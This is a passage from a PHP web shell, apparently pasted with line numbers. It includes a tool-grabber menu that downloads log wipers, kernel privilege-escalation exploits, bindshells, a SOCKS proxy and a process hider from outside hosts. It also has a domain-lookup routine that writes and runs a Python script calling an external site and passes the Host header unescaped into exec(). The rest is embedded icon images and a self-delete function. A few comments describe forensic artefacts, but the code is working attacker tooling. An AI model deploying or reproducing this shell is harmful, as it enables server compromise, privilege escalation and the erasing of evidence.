    // network / proxy-log indicators for outbound fetches from the web server.
    global $curdir;
    style();
    $tools = array(
"--- Log wipers ---"=>"1",
"Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
"Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
"--- Priv Escalation ---"=>"2",
"h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- Bindshells ---"=>"3",
"THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- Misc ---"=>"4",
"MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
    $names = array_flip($tools);
    echo("<b>Tools:</b>");
    echo("<form method='post'>");
    echo("<b>Output Directory</b><br>");
    echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
    echo("<select name='gf' style='align:center;'>");
    foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
    echo("</select>");
    echo("<br><input type='submit' value='Grab'>");
    echo("</form>");
}
  647.      
function lookup(){ // Domain lookup function
    // Writes a small Python 2 script (urllib2/xrange/print statement) to 'lookup.py' in the working directory,
    // runs it with the request's Host header value as argument (from $servinf, interpolated into the exec() string
    // unescaped), prints the results and deletes the script. Artefacts: a short-lived lookup.py next to the shell,
    // a python child process, and an outbound HTTP request to www.seologs.com.
    style();
    global $servinf;
    $script = "import urllib, urllib2, sys, re
req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
for i in xrange(0,len(site)):
print site[i]"; // My ***y python script
    $handle = fopen('lookup.py', 'w');
    fwrite($handle, $script);
    fclose($handle);
    echo("<h4>Domains</h4>");
    echo("<ul>"); // the <ul> is never closed
    $cmd = exec("python lookup.py " . $servinf[0], $ret);
    foreach($ret as $site){echo("<li>" . $site . "\n");}
    unlink('lookup.py');
}
  665.      
  666.      
  667.     function img($img){ // Images function
  668.     $images = array(
  669.     "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
  670.     "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
  671.     "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  672.     "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
  673.     "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
  674.     "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
  675.     "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
  676.     "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
  677.     "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  678.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  679.     "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
  680.     "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
  681.     "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  682.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  683.     "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
  684.     "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
  685.     "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
  686.     "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
  687.     "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
  688.     "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
  689.     "kUgXEQA7",
  690.     "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
  691.     "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
  692.     "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
  693.     "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
  694.     "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
  695.     "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
  696.     "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
  697.     "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
  698.     "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
  699.     "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
  700.     "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
  701.     "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
  702.     "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
  703.     "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
  704.     "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
  705.     "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
  706.     "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  707.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
  708.     "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
  709.     "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnY***QLhBiJigsJADs=",
  710.     "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  711.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  712.     "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
  713.     "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
  714.     header('Content-type: image/gif');
  715.     echo base64_decode($images[$img]);
  716.     die();
  717.     }
  718.      
  719.     function kill(){ // Shell deleter function
  720.     style();
  721.     echo("<form method='post'>");
  722.     echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
  723.     echo("<input type='submit' value='Delete'>");
  724.     echo("</form>");
  725.     if($_POST['ver'] == "confirm"){
  726.     $self = basename($_SERVER['PHP_SELF']);
  727.     if(unlink($self)){echo("Deleted");}
  728.     else{echo("Failed");}
  729.     }
  730.     }
  731.     die();
  732.     ?>
  733.  
  734.  
